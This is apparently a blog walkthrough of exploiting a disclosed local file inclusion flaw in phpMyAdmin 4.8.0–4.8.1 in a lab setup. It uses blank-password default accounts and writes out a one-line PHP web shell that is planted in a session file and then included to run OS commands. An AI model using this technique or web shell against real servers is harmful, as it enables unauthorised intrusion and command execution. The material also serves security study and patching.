Last month, there was a disclosure about LFI at PHPMyadmin 4.8.0-4.8.1. Exploitation of this vulnerability may lead to remote code execution.

The big challenge is, to be exploited, this vulnerability requires authenticated user. But fortunately, default mariadb installation (I will use mariadb in this sample case) includes anonymous and pma user, both with no password.

mysql

Now I will setup the target environment :

  1. XAMPP for linux version 7.0.30. This package includes : PHPMyAdmin version 4.8.0.1, mariadb version 10.1.32, php version 7.0.30
  2. Ubuntu server 16.04
  3. PHPMyAdmin configuration :
    1. $cfg[‘Servers’][$i][‘AllowNoPassword’] = true; //true by default, other PHPMyAdmin packages might different
    2. Comment 3 lines under Authentication type so we must provide user/password to login into PHPMyAdmin
      xampp-conf2
    3. change file /opt/lampp/etc/extra/httpd-xampp.conf so PHPMyAdmin can be accessed from networkxampp-conf1

 

Now, steps of exploitation :

  1. Login to PHPMyAdmin. Login to PHPMyadmin using anonymous or pma user. phpmyadmin1Who needs password if blank is just enough 😀phpmyadmin2
  2. Lets test the vulnerabilityphpmyadmin3
  3. For more fun, lets escalate to RCE. First, we need to write PHP code into server. We can use PHPMyAdmin example script for single signon. Why I use this script? Because we can write any string into session without need to login. Maybe this trick will be usefull for other LFI issues 😀 . Write this code into username field <pre><?php echo shell_exec($_GET[“shell”]);?>phpmyadmin4Then click submit, and check for a cookie named SignonSessionphpmyadmin5Check the session file on the target server, the PHP code is successfully written.phpmyadmin6.png
  4. Now, include the session into PHPMyAdmin and add variable GET shellphpmyadmin7And os command dir executed.
Advertisements